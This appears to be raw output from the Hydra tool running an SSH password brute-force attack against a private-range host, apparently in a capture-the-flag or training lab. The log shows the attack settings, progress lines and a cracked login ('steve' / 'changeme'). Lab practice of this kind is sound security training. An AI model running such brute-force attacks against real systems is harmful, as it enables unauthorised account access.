Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-17 01:15:20
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.153.102:22/
[STATUS] 102.00 tries/min, 102 tries in 00:01h, 14344303 to do in 2343:51h, 16 active
[STATUS] 86.33 tries/min, 259 tries in 00:03h, 14344146 to do in 2769:09h, 16 active
[STATUS] 80.29 tries/min, 562 tries in 00:07h, 14343843 to do in 2977:40h, 16 active
[STATUS] 82.80 tries/min, 1242 tries in 00:15h, 14343163 to do in 2887:07h, 16 active
[STATUS] 83.71 tries/min, 2595 tries in 00:31h, 14341810 to do in 2855:28h, 16 active
[22][ssh] host: 10.10.153.102   login: steve   password: changeme
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-17 02:02:17
